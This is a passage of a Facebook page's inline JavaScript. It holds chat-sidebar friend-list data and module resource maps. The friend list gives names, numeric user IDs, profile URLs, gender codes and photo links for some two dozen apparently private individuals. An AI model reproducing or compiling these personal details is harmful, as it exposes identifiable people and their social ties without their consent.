Whitman",short_name:"Sinéad"},{id:544932846,image_src:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/c0.5.32.32/p32x32/22540153_10155964319922847_8966755241221933641_n.jpg?_nc_cat=0&oh=808cfe4ee10ace87d0e523450704841b&oe=5BBC2CF1",name:"Eddie Lilfella",short_name:"Eddie"},{id:545754124,image_src:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/28576881_10155615596949125_4508644752342254208_n.jpg?_nc_cat=0&oh=ee1377b719efffb7c246a902a51696a2&oe=5BB4B5DF",name:"Nic Brindley",short_name:"Nic"}],text:""}],list:["100001983112325-2","100007444623061-2","100004191843068-2","100015358598632-2","100021653831040-2","100006907545849-2","100010825594110-2","100001520882589-2","100023811603191-2","100015161917328-2","100022844021725-2","100005216520628-2","100018930885425-2","100022003802889-2","100015597606638-2","100014379996895-2","100011738303596-2","100015117007890-2","100014728878329-2","100013903003981-2","100013919472998-2","100021200690737-2","100016896125077-2","1174640160-2","100018230501540-2","100004407343789-2","100021441938152-2","100018660224630-2","100015308676949-2","100001983112325-0","100007444623061-0","100004191843068-0","100015358598632-0","100021653831040-0","100006907545849-0","100010825594110-0","100001520882589-0","100023811603191-0","100015161917328-0","100022844021725-0","100005216520628-0","100018930885425-0","100022003802889-0","100015597606638-0","100014379996895-0","100011738303596-0","100015117007890-0","100014728878329-0","100013903003981-0","100013919472998-0","100021200690737-0","100016896125077-0","1174640160-0","100018230501540-0","100004407343789-0","100021441938152-0","100018660224630-0","100015308676949-0"],shortProfiles:{"100015358598632":{id:"100015358598632",name:"Robin Nunez",firstName:"Robin",vanity:"littleladytrapqueen",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/c0.0.32.32/p32x32/35265251_369037706951513_915453209487605760_n.jpg?_nc_cat=0&oh=12f2a948754d31abf0cfd03679f3f19c&oe=5BB3E581",uri:"https://www.facebook.com/littleladytrapqueen",gender:1,i18nGender:2,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Nunez","Robin"],alternateName:"Alexa Hermanus Green ",is_nonfriend_messenger_contact:false},"100018930885425":{id:"100018930885425",name:"Sarah James",firstName:"Sarah",vanity:"",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/19665591_108832596424436_4747490817629654702_n.jpg?_nc_cat=0&oh=11b633989fce50aed14878c5d3f1add0&oe=5BA9AB5A",uri:"https://www.facebook.com/profile.php?id=100018930885425",gender:1,i18nGender:2,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["James","Sarah"],alternateName:"",is_nonfriend_messenger_contact:false},"100001983112325":{id:"100001983112325",name:"Kushal",firstName:"Kushal",vanity:"kushal.chaudhary.56",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/32405534_1699574650118622_7831253736130347008_n.jpg?_nc_cat=0&oh=a0e2c6a3377f73509b99ae27f497188e&oe=5BB32ED4",uri:"https://www.facebook.com/kushal.chaudhary.56",gender:2,i18nGender:1,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Kushal"],alternateName:"",is_nonfriend_messenger_contact:false},"100007444623061":{id:"100007444623061",name:"Bryan Aiden Fox",firstName:"Bryan",vanity:"Fox.exe.403",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/31290674_2083674105224057_1650969618807783424_n.jpg?_nc_cat=0&oh=aba7a977d91b1148531ed1e62ec52a6d&oe=5BB0085C",uri:"https://www.facebook.com/Fox.exe.403",gender:2,i18nGender:1,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Fox","Bryan"],alternateName:"Fox",is_nonfriend_messenger_contact:false},"100004191843068":{id:"100004191843068",name:"Jawahar Reddy",firstName:"Jawahar",vanity:"jawahar19",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/c0.2.32.32/p32x32/13716080_654990751317314_5782437732387478710_n.jpg?_nc_cat=0&oh=5bd8c8a311340296c9986bfd866b77b5&oe=5BAD78F2",uri:"https://www.facebook.com/jawahar19",gender:2,i18nGender:1,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Reddy","Jawahar"],alternateName:"Reddy",is_nonfriend_messenger_contact:false},"100006907545849":{id:"100006907545849",name:"Âśhîśh Ÿáđáv",firstName:"Âśhîśh",vanity:"",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/24231963_1955021538071412_5854283302461866296_n.jpg?_nc_cat=0&oh=7a1d82436fbf0002ee8dfa98851cf874&oe=5BA25DA2",uri:"https://www.facebook.com/profile.php?id=100006907545849",gender:2,i18nGender:1,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Ÿáđáv","Âśhîśh"],alternateName:"",is_nonfriend_messenger_contact:false},"100001520882589":{id:"100001520882589",name:"Krystal Hargraves",firstName:"Krystal",vanity:"KrystalTx84",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/22154249_1605444839516197_4948085458170668790_n.jpg?_nc_cat=0&oh=6a1420eb3d3fd83304460942e4e59170&oe=5BA5C67C",uri:"https://www.facebook.com/KrystalTx84",gender:1,i18nGender:2,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Hargraves","Krystal"],alternateName:"",is_nonfriend_messenger_contact:false},"100015161917328":{id:"100015161917328",name:"Giliola Maggi",firstName:"Giliola",vanity:"",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/21317488_272151609966901_7770974268497695995_n.jpg?_nc_cat=0&oh=a26351096aabe83d1e5bdee6dd5fbcd7&oe=5BC1A9E2",uri:"https://www.facebook.com/profile.php?id=100015161917328",gender:1,i18nGender:2,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Maggi","Giliola"],alternateName:"",is_nonfriend_messenger_contact:false},"100022844021725":{id:"100022844021725",name:"Ed Edd Eddy",firstName:"Ed",vanity:"ed.eddeddy.3386",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/23131657_112311246207009_7013396842982013598_n.jpg?_nc_cat=0&oh=56d745491075f7850f89acab2c40591e&oe=5BC2CC15",uri:"https://www.facebook.com/ed.eddeddy.3386",gender:2,i18nGender:1,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Edd","Eddy","Ed"],alternateName:"",is_nonfriend_messenger_contact:false},"100005216520628":{id:"100005216520628",name:"Dewey Swimberg",firstName:"Dewey",vanity:"dewey.swimberg",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/31356535_833939586789918_5548627228898702518_n.jpg?_nc_cat=0&oh=4a5b7d77191d7f6a83807deed887576e&oe=5B9F00BB",uri:"https://www.facebook.com/dewey.swimberg",gender:2,i18nGender:1,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Swimberg","Dewey"],alternateName:"",is_nonfriend_messenger_contact:false},"100015597606638":{id:"100015597606638",name:"Maria Maximo Manoli",firstName:"Maria",vanity:"maximomaria.gatoulaspider",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/33248872_322716351591616_8737042414503460864_n.jpg?_nc_cat=0&oh=a8c52a99ade6647665f35ddc760b3e09&oe=5BBB7FFE",uri:"https://www.facebook.com/maximomaria.gatoulaspider",gender:1,i18nGender:2,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Manoli","Maria"],alternateName:"",is_nonfriend_messenger_contact:false},"100014379996895":{id:"100014379996895",name:"Joshua Allen Cole Scott",firstName:"joshua allen",vanity:"deamon.dread",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/33503340_371250176697646_3192887625673342976_n.jpg?_nc_cat=0&oh=61109a5d678a002e87989a0cd88df467&oe=5BC02ECD",uri:"https://www.facebook.com/deamon.dread",gender:2,i18nGender:1,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Scott","joshua","allen"],alternateName:"",is_nonfriend_messenger_contact:false},"100011738303596":{id:"100011738303596",name:"Dennis Edano",firstName:"Dennis",vanity:"dennis.edano.31",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/29542898_512347315833207_1354676995526027742_n.jpg?_nc_cat=0&oh=5f75c17fee24847cd20f8961154e0892&oe=5BAF4B50",uri:"https://www.facebook.com/dennis.edano.31",gender:2,i18nGender:1,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Edano","Dennis"],alternateName:"",is_nonfriend_messenger_contact:false},"100015117007890":{id:"100015117007890",name:"Daniela Leigh Carroll",firstName:"Daniela",vanity:"evitorious.daniela",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/23376481_296606560853242_5344055543158248046_n.jpg?_nc_cat=0&oh=e5be4507c8e9739c08703cd7cecf5af1&oe=5BA8FF58",uri:"https://www.facebook.com/evitorious.daniela",gender:1,i18nGender:2,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Carroll","Daniela"],alternateName:"",is_nonfriend_messenger_contact:false},"100014728878329":{id:"100014728878329",name:"Thior Gheralexis Soillos",firstName:"Thior",vanity:"gregory.wright.5015983",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/c0.0.32.32/p32x32/35058209_390673348100291_6804392734296637440_n.jpg?_nc_cat=0&oh=7486021f06b6d2efceb79085e5d3a51e&oe=5B76AB90",uri:"https://www.facebook.com/gregory.wright.5015983",gender:2,i18nGender:1,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Soillos","Thior"],alternateName:"Optilus",is_nonfriend_messenger_contact:false},"100013903003981":{id:"100013903003981",name:"Roger Hill",firstName:"Roger",vanity:"Crobar161962",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/18700192_268390433634388_106921864854852415_n.jpg?_nc_cat=0&oh=520974c058254106f10bb243cda233ff&oe=5BA5B093",uri:"https://www.facebook.com/Crobar161962",gender:2,i18nGender:1,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Hill","Roger"],alternateName:"Eagle Man",is_nonfriend_messenger_contact:false},"100013919472998":{id:"100013919472998",name:"Jackie Taylor",firstName:"Jackie",vanity:"jackie.taylor.16718979",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/19437231_276354946171819_5674738422100862261_n.jpg?_nc_cat=0&oh=c4f59c5ad2c4c6216f0f053948061d47&oe=5BB29485",uri:"https://www.facebook.com/jackie.taylor.16718979",gender:1,i18nGender:2,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Taylor","Jackie"],alternateName:"",is_nonfriend_messenger_contact:false},"100021200690737":{id:"100021200690737",name:"Willie Theriot",firstName:"Willie",vanity:"willie.theriot.54",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/23319070_129052301144792_685119595971708538_n.jpg?_nc_cat=0&oh=a6cc832b675df8884e1e6b6c17f729f3&oe=5BBDB009",uri:"https://www.facebook.com/willie.theriot.54",gender:2,i18nGender:1,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Theriot","Willie"],alternateName:"",is_nonfriend_messenger_contact:false},"100016896125077":{id:"100016896125077",name:"Niko Las",firstName:"Niko",vanity:"niko.las.505960",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/21430316_173990893174114_1322832148078307819_n.jpg?_nc_cat=0&oh=6d8ae209c97ae3d2522e4d19330eed5d&oe=5BA6E94B",uri:"https://www.facebook.com/niko.las.505960",gender:2,i18nGender:1,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Las","Niko"],alternateName:"",is_nonfriend_messenger_contact:false},"1174640160":{id:"1174640160",name:"Stephen Good",firstName:"Stephen",vanity:"stephen.good63",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/c5.0.32.32/p32x32/21317643_10212185867659956_5589578018251485840_n.jpg?_nc_cat=0&oh=ad9d3bd1ce15c55c7958584a3446d2c5&oe=5BAB29BA",uri:"https://www.facebook.com/stephen.good63",gender:2,i18nGender:1,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Good","Stephen"],alternateName:"",is_nonfriend_messenger_contact:false},"100018230501540":{id:"100018230501540",name:"Jenn Palmer",firstName:"Jenn",vanity:"jenniferpalmer666",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/35168715_208838806400468_3821935918894284800_n.jpg?_nc_cat=0&oh=56a122358cb5977e1a038ad536d262aa&oe=5BB0D7C5",uri:"https://www.facebook.com/jenniferpalmer666",gender:1,i18nGender:2,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Palmer","Jenn"],alternateName:"Anonymous blackhat code insane",is_nonfriend_messenger_contact:false},"100004407343789":{id:"100004407343789",name:"Robson Luís",firstName:"Robson",vanity:"robson.luis.56027",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/31956704_1037897143033854_1534357215157157888_n.jpg?_nc_cat=0&oh=6e8a90d7123b30ba80cbdd74b86d540a&oe=5BA8FBF6",uri:"https://www.facebook.com/robson.luis.56027",gender:2,i18nGender:1,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Luís","Robson"],alternateName:"Bici",is_nonfriend_messenger_contact:false},"100021441938152":{id:"100021441938152",name:"Akron Phoenix",firstName:"Akron",vanity:"phoenix.ghostanon.7",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/20882103_113637022694362_2325767007111944202_n.jpg?_nc_cat=0&oh=467ef6e6907d6a206b6e89936bec5f92&oe=5BB351DF",uri:"https://www.facebook.com/phoenix.ghostanon.7",gender:2,i18nGender:1,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Phoenix","Akron"],alternateName:"",is_nonfriend_messenger_contact:false},"100018660224630":{id:"100018660224630",name:"James Adames",firstName:"James",vanity:"gofightkill1135",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/34788270_204689976829675_6668567997038198784_n.jpg?_nc_cat=0&oh=d37ec4643e8e73da3df6723f076f4a48&oe=5BB6CE16",uri:"https://www.facebook.com/gofightkill1135",gender:2,i18nGender:1,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Adames","James"],alternateName:"",is_nonfriend_messenger_contact:false},"100015308676949":{id:"100015308676949",name:"Ulf Torjusen",firstName:"Ulf",vanity:"",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p32x32/17103767_143402492846706_9171987239520318366_n.jpg?_nc_cat=0&oh=87cebf39bbe91253386d3f432a763411&oe=5BADB5A3",uri:"https://www.facebook.com/profile.php?id=100015308676949",gender:2,i18nGender:1,type:"friend",is_friend:true,is_active:false,mThumbSrcSmall:null,mThumbSrcLarge:null,dir:null,searchTokens:["Torjusen","Ulf"],alternateName:"",is_nonfriend_messenger_contact:false},"100021653831040":{id:0,firstName:"Facebook User",gender:7,name:"Facebook User",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/c9.0.32.32/p32x32/10645251_10150004552801937_4553731092814901385_n.jpg?_nc_cat=0&oh=34118def9cef56d7dd64501de8faf3aa&oe=5BA8E526",type:"user"},"100010825594110":{id:0,firstName:"Facebook User",gender:7,name:"Facebook User",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/c9.0.32.32/p32x32/10645251_10150004552801937_4553731092814901385_n.jpg?_nc_cat=0&oh=34118def9cef56d7dd64501de8faf3aa&oe=5BA8E526",type:"user"},"100023811603191":{id:0,firstName:"Facebook User",gender:7,name:"Facebook User",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/c9.0.32.32/p32x32/10645251_10150004552801937_4553731092814901385_n.jpg?_nc_cat=0&oh=34118def9cef56d7dd64501de8faf3aa&oe=5BA8E526",type:"user"},"100022003802889":{id:0,firstName:"Facebook User",gender:7,name:"Facebook User",thumbSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/c9.0.32.32/p32x32/10645251_10150004552801937_4553731092814901385_n.jpg?_nc_cat=0&oh=34118def9cef56d7dd64501de8faf3aa&oe=5BA8E526",type:"user"}},nearby:[],recents:[]},26]]},content:{pagelet_sidebar:{container_id:"u_0_13"}},id:"pagelet_sidebar",phase:62,categories:["sidebar"],all_phases:[63,62]});}),"onPageletArrive pagelet_sidebar",{"root":true,"pagelet":"pagelet_sidebar"})(); </script> <div class="hidden_elem"> </div> <script> bigPipe.beforePageletArrive("pagelet_dock") </script> <script> require("TimeSlice").guard((function(){bigPipe.onPageletArrive({bootloadable:{UFICommentVisibilityStore:{resources:["Bee0v","IO8eo"],needsAsync:1,module:1},"ConversationNubCollapsedSelectorMenu.react":{resources:["hL4QF","NHGTD","BEw9R","vjHYq","/NvwD","dlBY6","Bee0v","rdSEf","AfZgB","0n0v6","AzjwV","IO8eo","rzQjB","zpNP2","q+9No","2dbAx","MbCGD","jAeyQ","IEK7S","sQ7ef"],needsAsync:1,module:1},"ConversationNubDockedTabGroup.react":{resources:["BEw9R","vjHYq","/NvwD","Bee0v","AfZgB","vOI5W","IO8eo","rzQjB","zpNP2","q+9No","2dbAx","MbCGD","sQ7ef"],needsAsync:1,module:1},"ConversationNubHeaderMenu.react":{resources:["BEw9R","vjHYq","/NvwD","AMXo2","Bee0v","rdSEf","AfZgB","0n0v6","IO8eo","rzQjB","zpNP2","q+9No","5p2rH","2dbAx","MbCGD","IEK7S","sQ7ef","FXvTH"],needsAsync:1,module:1},ConversationNubLogger:{resources:["BEw9R","vjHYq","/NvwD","Bee0v","AfZgB","IO8eo","rzQjB","q+9No","2dbAx","MbCGD","sQ7ef"],needsAsync:1,module:1},ConversationNubSurveys:{resources:["BEw9R","vjHYq","/NvwD","Bee0v","AfZgB","IO8eo","rzQjB","q+9No","2dbAx","MbCGD","sQ7ef","MfM+L"],needsAsync:1,module:1},ConversationNubUFICentralUpdateManager:{resources:["93afF","Bee0v","IO8eo"],needsAsync:1,module:1},NotificationConversationController:{resources:["BEw9R","vjHYq","/NvwD","Bee0v","AfZgB","IO8eo","rzQjB","q+9No","2dbAx","MbCGD","sQ7ef"],needsAsync:1,module:1},ChatTabPolicy:{resources:["oKtm2","BEw9R","/NvwD","Bee0v","IO8eo","rY0BM","rzQjB","zpNP2","q+9No","AYvAm","sQ7ef"],needsAsync:1,module:1},ChatTabTypeaheadRenderer:{resources:["iLoE/","QlLTz","/NvwD","Bee0v","LmFqo","IO8eo","q+9No","Pfi8i","Ve8cP","sQ7ef"],needsAsync:1,module:1},FantaAppStore:{resources:["BEw9R","/NvwD","Bee0v","IO8eo","rzQjB","zpNP2","q+9No","AYvAm","sQ7ef"],needsAsync:1,module:1},"FantaMercuryTabsWithMain.react":{resources:["n3CYQ","BEw9R","/NvwD","Bee0v","AfZgB","IO8eo","rzQjB","zpNP2","q+9No","AYvAm","jAeyQ","sQ7ef"],needsAsync:1,module:1},FantaReducersFileUploader:{resources:["6PS40","/NvwD","Bee0v","wWRfV","3en/6","IO8eo","q+9No","MbCGD","sQ7ef"],needsAsync:1,module:1},FantaReducersGetMessages:{resources:["/0QuQ","BEw9R","/NvwD","0k9b3","Bee0v","IO8eo","rzQjB","zpNP2","q+9No","AYvAm","Av0f1","sQ7ef"],needsAsync:1,module:1},FantaReducersSendMessages:{resources:["n3CYQ","BEw9R","f5XFz","/NvwD","0k9b3","Bee0v","IO8eo","rzQjB","zpNP2","q+9No","AYvAm","jAeyQ","Av0f1","sQ7ef","IHpTd"],needsAsync:1,module:1},FantaReducersSharePreview:{resources:["/NvwD","IO8eo","q+9No","6Lgk+"],needsAsync:1,module:1},MessengerRTCIncomingDialogController:{resources:["nY0qV","BEw9R","DPETj","ASgw6","+FAAM","/NvwD","0k9b3","Bee0v","IO8eo","m2um9","e3rlC","rzQjB","zpNP2","q+9No","+pd15","AYvAm","Xp5SU","Av0f1","sQ7ef","gL57p"],needsAsync:1,module:1},MessengerRTCMissedCallDialogController:{resources:["nY0qV","BEw9R","ASgw6","+FAAM","/NvwD","Bee0v","IO8eo","e3rlC","rzQjB","zpNP2","q+9No","+pd15","onpAC","AYvAm","Xp5SU","sQ7ef","gL57p"],needsAsync:1,module:1},MessengerRTCGroupCallIncomingDialogController:{resources:["34BP/","nY0qV","h/t6L","BEw9R","NmVPR","DPETj","ASgw6","+FAAM","utT+H","kd1AC","/NvwD","0k9b3","Bee0v","dIFKP","DGufC","K5VnS","IO8eo","m2um9","e3rlC","rzQjB","zpNP2","q+9No","+pd15","IdUSu","onpAC","byU9X","AYvAm","Xp5SU","Av0f1","2VNOd","sQ7ef","gL57p"],needsAsync:1,module:1},FBRTCIncomingCallController:{resources:["h/t6L","BEw9R","saB+d","DPETj","/NvwD","Bee0v","IO8eo","e3rlC","rzQjB","zpNP2","q+9No","v2u4f","onpAC"],needsAsync:1,module:1},FBRTCIncomingCallDialog:{resources:["BEw9R","DPETj","/NvwD","Bee0v","IO8eo","q+9No","sQ7ef"],needsAsync:1,module:1},FBRTCMissedVideoCallHandler:{resources:["BEw9R","DPETj","/NvwD","Bee0v","IO8eo","e3rlC","rzQjB","zpNP2","q+9No","onpAC","sQ7ef"],needsAsync:1,module:1},FBRTCUnsupportedBrowserMessage:{resources:["h/t6L","DPETj","/NvwD","Bee0v","IO8eo","q+9No","sQ7ef"],needsAsync:1,module:1},FBRTCGroupCallIncomingController:{resources:["34BP/","h/t6L","n3CYQ","NHGTD","BEw9R","NmVPR","saB+d","DPETj","ASgw6","+FAAM","P5aPI","/NvwD","AMXo2","0k9b3","Bee0v","J6WRq","AfZgB","rXUOD","dIFKP","K5VnS","IO8eo","C/4sM","e3rlC","rzQjB","zpNP2","q+9No","+pd15","5p2rH","v2u4f","onpAC","byU9X","AYvAm","Xp5SU","87rxF","sQ7ef"],needsAsync:1,module:1},FBRTCGroupCallIncomingDialog:{resources:["34BP/","h/t6L","BEw9R","NmVPR","DPETj","ASgw6","+FAAM","utT+H","kd1AC","/NvwD","Bee0v","dIFKP","DGufC","K5VnS","IO8eo","e3rlC","rzQjB","zpNP2","q+9No","+pd15","IdUSu","onpAC","byU9X","AYvAm","Xp5SU","2VNOd","sQ7ef","gL57p"],needsAsync:1,module:1},MercuryTypeahead:{resources:["iLoE/","kHLQg","Bee0v","TB1SC","LmFqo","27fPb","IO8eo","Pfi8i","qnri/","onpAC","MbCGD","7kNAV","Ve8cP","sQ7ef"],needsAsync:1,module:1},ContextualTypeaheadView:{resources:["/NvwD","Bee0v","0n0v6","LmFqo","IO8eo","zpNP2","Pfi8i","7kNAV","Ve8cP","sQ7ef"],needsAsync:1,module:1},PagesMercuryChatTabIndicatorHandler:{resources:["BEw9R","Bee0v","IO8eo","zpNP2","q+9No","Yu7J/"],needsAsync:1,module:1},FantaTabsVisibleTypedLogger:{resources:["/qqEH","IO8eo"],needsAsync:1,module:1},"ChatInitialDataTransformer.bs":{resources:["BEw9R","Bee0v","IO8eo","q+9No"],needsAsync:1,module:1},MessengerSecondarySearchFunnelConstants:{resources:["q+9No"],needsAsync:1,module:1},MessengerSecondarySearchFunnelLogger:{resources:["Bee0v","IO8eo","q+9No","onpAC","iNDLi"],needsAsync:1,module:1},MqttWsClientTypedLogger:{resources:["/XZab","IO8eo"],needsAsync:1,module:1},FantaTabsReactApp:{resources:["n3CYQ","BEw9R","np5Vl","/NvwD","Bee0v","AfZgB","IO8eo","rzQjB","zpNP2","q+9No","AYvAm","jAeyQ","sQ7ef"],needsAsync:1,module:1},PhotoSnowliftVideoNode:{resources:["jJepu","h/t6L","j4Ljx","YFvtE","G8UgY","8xTEU","E2a+b","BEw9R","NmVPR","1gxCI","KaTm5","np5Vl","nJpkm","/NvwD","oHpkH","dlBY6","uSKfe","Bee0v","rdSEf","0n0v6","9yswz","dIFKP","IO8eo","fHANF","LKkKN","D0Bd3","rzQjB","zpNP2","q+9No","+4sWy","3G6zQ","pvLtg","MbCGD","87rxF","IEK7S","sQ7ef","IDuub"],needsAsync:1,module:1},VideoPlayerMetaData:{resources:["Bee0v","IO8eo","87rxF"],needsAsync:1,module:1},TahoeController:{resources:["YFvtE","BEw9R","XZrv9","vjHYq","utT+H","np5Vl","/NvwD","Bee0v","rdSEf","0n0v6","IPMaP","dIFKP","IO8eo","D0Bd3","W+Cdk","rzQjB","zpNP2","q+9No","OMZQ7","3yQUr","MbCGD","87rxF","sQ7ef"],needsAsync:1,module:1},"RelationshipDelightsActorAnimation.react":{resources:["zNhf6","a4jZl","3hFrG","qcXc9","8AC67","Bee0v","ooma8","IO8eo","iHTgO","BC7lK","MuJXI"],needsAsync:1,module:1},FBStoriesLiveNotificationHandler:{resources:["kW4Ky","Mlj6m","8Tebs","+FAAM","/NvwD","Bee0v","rdSEf","rXUOD","IO8eo","rzQjB","q+9No","hv63h","8j6+w","c853G","MbCGD","jAeyQ","sQ7ef","APhak"],needsAsync:1,module:1},"ChatSidebarComposeLink.react":{resources:["BEw9R","/NvwD","Bee0v","8Q9tZ","IO8eo","rzQjB","zpNP2","q+9No","AYvAm","sQ7ef"],needsAsync:1,module:1},"ChatSidebarDropdown.react":{resources:["BEw9R","0O7A6","vjHYq","np5Vl","/NvwD","AMXo2","kHLQg","Bee0v","rdSEf","AfZgB","0n0v6","IO8eo","rzQjB","zpNP2","q+9No","2dbAx","MbCGD","IEK7S","wLka7","sQ7ef"],needsAsync:1,module:1},ChatSidebarGroupCreateButtonReactComponent:{resources:["eqNxI","Bee0v","AfZgB","IO8eo","q+9No"],needsAsync:1,module:1},"LiveVideoBeeperItemContentsImpl.react":{resources:["jJepu","kwATM","h/t6L","j4Ljx","G8UgY","+8tRp","BEw9R","NmVPR","1gxCI","vjHYq","KaTm5","np5Vl","nJpkm","/NvwD","oHpkH","dlBY6","Bee0v","rdSEf","9yswz","dIFKP","IO8eo","LKkKN","rzQjB","zpNP2","q+9No","+4sWy","2dbAx","3G6zQ","9d4C0","Xc4xD","onpAC","MbCGD","jAeyQ","87rxF","sQ7ef"],needsAsync:1,module:1}},resource_map:{hL4QF:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3iTfa4/yX/l/en_GB/Kg-9xB1l7kc.js",crossOrigin:1},AzjwV:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3idEu4/y4/l/en_GB/GvVHAXyt8eC.js",crossOrigin:1},vOI5W:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3iJ5S4/y9/l/en_GB/WvlvN4wiFlz.js",crossOrigin:1},FXvTH:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3i9nO4/yT/l/en_GB/peA6UqSomnu.js",crossOrigin:1},"MfM+L":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/y5/r/ONb5dyZDzpw.js",crossOrigin:1},"93afF":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/6v0I1CCMCKG.js",crossOrigin:1},oKtm2:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3iH3N4/yu/l/en_GB/9CRd9PVjnL4.js",crossOrigin:1},rY0BM:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/y3/r/cPQ1yJjeN4v.js",crossOrigin:1},QlLTz:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3iHOx4/yN/l/en_GB/EgWBQ9b1Fy2.js",crossOrigin:1},LmFqo:{type:"css",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/ZKGR6UNoTMZ.css",permanent:1,crossOrigin:1},Ve8cP:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3ik694/yP/l/en_GB/-Bc874_KGTM.js",crossOrigin:1},wWRfV:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/oZduTUM9Bub.js",crossOrigin:1},"3en/6":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3iNqG4/yI/l/en_GB/lAflPbm19UD.js",crossOrigin:1},IHpTd:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3ilX24/y7/l/en_GB/hxdGKCkMriP.js",crossOrigin:1},"6Lgk+":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yy/r/TqyLIe